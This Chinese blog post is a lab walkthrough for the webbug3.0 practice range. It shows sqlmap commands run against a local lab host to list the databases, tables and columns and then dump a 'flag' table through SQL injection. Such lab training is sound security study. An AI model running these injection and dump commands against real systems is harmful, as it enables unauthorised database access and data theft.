webbug3.0靶场

witer 2018-07-27 原文

webbug3.0靶场

目标一,由于用的kli系统,所以没有去手动注入,用了sqlmap来注入检测

先用sqlmap -u “http://192.168.199.136/pentest/test/sqli/sqltamp.php?gid=1” –current-db查看当前数据库得到数据库pentesterlab

然后查看当前数据库的表sqlmap -u “http://192.168.199.136/pentest/test/sqli/sqltamp.php?gid=1” -D pentesterlab –table

一看这个flag表就知道肯定是它了

用sqlmap -u “http://192.168.199.136/pentest/test/sqli/sqltamp.php?gid=1” -D pentesterlab -T flag –columns 看一下表里面的字段

看到有两个字段flag和id,直接暴flag字段内容

sqlmap -u “http://192.168.199.136/pentest/test/sqli/sqltamp.php?gid=1” -D pentesterlab -T flag -C flag –dump –batch
(–batch自动化不询问,–dump把结果导出)

 

 

posted on 2018-07-27 16:51 莫违 阅读() 评论() 编辑 收藏

 

 
版权声明:本文为witer原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://www.cnblogs.com/witer/p/9378506.html

webbug3.0靶场的更多相关文章

随机推荐

  1. 面向过程与面向对象的一些区别,基于抽象类的一些思考

    <?php /*抽象类的应用 //场景:判断不同来源,显示不同提示文字 面向过程如下处理$a=\R […]...

  2. JZ2440 linux-3.4.2内核启动报错:Verifying Checksum … Bad Data CRC

    使用的uboot版本是1.1.6,是打过u-boot-1.1.6_jz2440.patch的; kernel使 […]...

  3. 老司机迷路了,SQL统计分类数量问题

    好久没有用SQL统计数据了,今天接到一个临时任务,统计下药店的覆盖率,一通操作猛如虎,数据很快导出来了,但一细 […]...

  4. 网址导航 – merrynuts

    网址导航 51ape 综合网站 搜狐 新浪 腾讯 网易 凤凰网  百度 哔哩哔哩 有道词典 剑桥词典 牛津字典 […]...

  5. Hadoop-day08_yarn_工作流程详解

    Hadoop-yarn_工作流程详解YARN的基本结构由一个ResourceManager与多个NodeManager组成。ResourceManager负责对NodeManager所持有的资源进行统一管理和调度。当在处理一个作业时Re...

  6. redis 系列9 对象类型(字符串,哈希,列表,集合,有序集合)与数据结构关系

    redis 系列9 对象类型(字符串,哈希,列表,集合,有序集合)与数据结构关系 一.概述   在前面章节中, […]...

  7. 实现基于netty的web框架,了解一下

    上一篇写了,基于netty实现的rpc的微框架,其中详细介绍netty的原理及组件,这篇就不过多介绍 这篇实现 […]...

  8. Python基础之:Python中的流程控制

    目录 简介 while语句 if 语句 for语句 Break Continue pass 简介 流程控制无非 […]...

展开目录

目录导航